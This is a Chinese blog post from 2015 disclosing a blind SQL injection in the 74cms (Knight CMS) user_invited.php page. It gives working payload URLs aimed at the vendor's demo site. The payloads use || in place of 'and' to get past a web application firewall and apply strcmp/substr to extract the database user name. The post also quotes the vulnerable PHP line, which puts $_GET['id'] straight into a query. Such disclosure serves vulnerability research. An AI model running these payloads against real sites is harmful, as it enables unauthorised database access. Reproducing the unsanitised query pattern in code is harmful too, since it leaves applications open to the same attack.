骑士CMS(20150104)一处SQL注入

时间:2015-1-28    作者:admin    分类: 技术交流

http://demo.74cms.com/

注册企业账户,填写企业信息,然后发布职位。再访问下面的URL。



URL为:

code 区域 
http://demo.74cms.com/user/user_invited.php?id=1&act=invited



其中id参数可以注入。



由于有安全狗的原因,and会被拦截,我们用&&和||代替吧.

code 区域 
http://demo.74cms.com/user/user_invited.php?id=1%20||%201&act=invited





以下适用SQL盲注:

FALSE的情况:id为:

code 区域 
1 || 0



后台执行的SQL为:

code 区域 
2015-01-05 12:55:18  select * from qs_company_down_resume where company_uid=1 and resume_id = 1 || 0


code 区域 
http://demo.74cms.com/user/user_invited.php?id=1%20||%200&act=invited


2.png


code 区域 
http://demo.74cms.com/user/user_invited.php?id=1%20||%20strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116))&act=invited


5.png





TRUE的情况:id为:

code 区域 
1 || 1



后台执行的SQL为:

code 区域 
2015-01-05 12:56:10  select * from qs_company_down_resume where company_uid=1 and resume_id = 1 || 1


code 区域 
http://demo.74cms.com/user/user_invited.php?id=1%20||%201&act=invited


3.png


code 区域 
http://demo.74cms.com/user/user_invited.php?id=1%20||%20strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116))&act=invited


4.png







对应的代码为:/user/user_invited.php:191

code 区域 
191      $row = $db->getone("select * from ".table('company_down_resume')." where company_uid={$_SESSION['uid']} and resume_id = {$_GET['id']}");

 192      if(!$row){

 193              

 194              //-------------------//

 195              if($_SESSION['utype']==1){

 196          if ($_CFG['operation_mode']=="2")

 197          {





$_GET['id']直接进入了SQL,没有'号。

标签: 注入 骑士cms

感谢9年的陪伴,江湖再见!!!

标签

热门文章

链接